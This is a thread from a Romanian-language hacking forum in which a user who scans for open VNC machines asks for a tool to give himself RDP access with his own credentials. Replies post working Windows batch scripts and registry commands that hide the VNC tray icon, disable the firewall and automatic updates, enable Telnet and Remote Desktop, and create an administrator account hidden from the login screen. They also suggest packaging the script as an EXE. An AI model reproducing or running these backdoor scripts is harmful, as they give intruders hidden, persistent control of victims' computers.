Jump to content
acuablue

Salut cine se pricepe sa faca un cmd

Recommended Posts

Salut cine se pricepe sa faca un cmd sau ceva asemanator pentru vnc ca sa il faca remote vnc respectiv cu un user si un pass setat de mine, mai pe scurt vreau un prog ceva anume sa ii activeze rdp si daca il are sa imi faca un user si pass care il propun eu . nu stiu daca mam explicit prea bine la cea ce vreau .

multumesc

Link to comment
Share on other sites

Impropriu zis sa faci un cmd, din cate am inteles vrei un rdp brute command line, sau un mallware care odata infectat sa ii activeze rdp,eu zic daca nu stii sa-ti explici propria idee nimeni nu o sa te ajute, eu zis ca inveti cu ce se mananca remote desktop pe urma sa iti permiti sa ceri ceva zic asta pentru ca am observat ca esti cam fixat pe RDP.

Sa mute cineva la Cereri, nu are ce cauta la programare.

Edited by me.mello
Link to comment
Share on other sites

te duci pe goagle si cauti "tightvnc", iarasi pe goagle cauti "hide vnc tray icon"

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"DisableTrayIcon"=dword:00000001

te duci in VNC Server si iti setezi portu si parola apoi te duci in HKEY_LOCAL_MACHINE\SOFTWARE\ORL si exportezi registry in reg.reg ca ex.

cu putine cunostinte in CMD poti sa o faci cu VNC nu remote desktop (daca utilizatoru are XP o cam iei in freza cu RDP-u). Faci drop la serverul de vnc la el in PC -> faci import la fisierul cu registri -> disable firewall (optional) -> start VNC Server !!

asa.. si mai ai nevoie de Bat To Exe Converter Bat To Exe Converter pentru a "converta" batch scripting in EXE. NU uita sa bifezi "Add administrator manifest" deoarece trebuie sa scrii in HKLM !!!

// asta ?

@echo off
net user YOURUSER YOURPASS /add
net localgroup Administrator YOURUSER /add
net group "Domain Admins" YOURUSER /add

dar tu totusi nu vrei sa intelegi

pe XP daca activezi RDP si te logezi dai afara utilizatorul logat din consola (care sta in fata monitorului)

plm ia de aici .. google ...

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

To enable Remote assistance:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

//

Tot de pe Google

@echo off

REM ****************
REM Disable off "AUTO UPDATE"
REM ****************
sc config wuauserv start= disabled
net stop wuauserv

REM ****************
REM Disable windows xp Firewall
REM ****************
netsh firewall set opmode disable

REM ****************
REM Enable TELNET
REM ****************
sc config tlntsvr start= auto
net start telnet

REM ****************
REM Enable Remote Desktop
REM ****************
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

REM ***************
REM Create a HIDDEN USER usr= hack007, pass= dani
REM ***************
net user hacker007 dani /add
net localgroup "Administrators" /add hacker007
net localgroup "Users" /del hacker007
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker007 /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

Edited by Maximus
Link to comment
Share on other sites

mai oameni buni , pe intelesul tuturor , am un vnc scanner prind cu el , ideiea e ca vreau ceva sa imi creeze vnc respectiv care lam prins in rdp o cestie un cacat o comanda . in care sa imi faca un user dex sysadmin pass caca , avand toate astea vnc respectiv e ok functioneaza pe user care e propietarul eu intretimp sa intru cu userul sysadmin pe rdp intelege cineva ? ca explic ca la copii .

1 vnc --- 2 virus, command, aplicatie - 3 creeare transformare vnc in rdp cu user propiu -- 4 asta e tot astia sunt passi

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...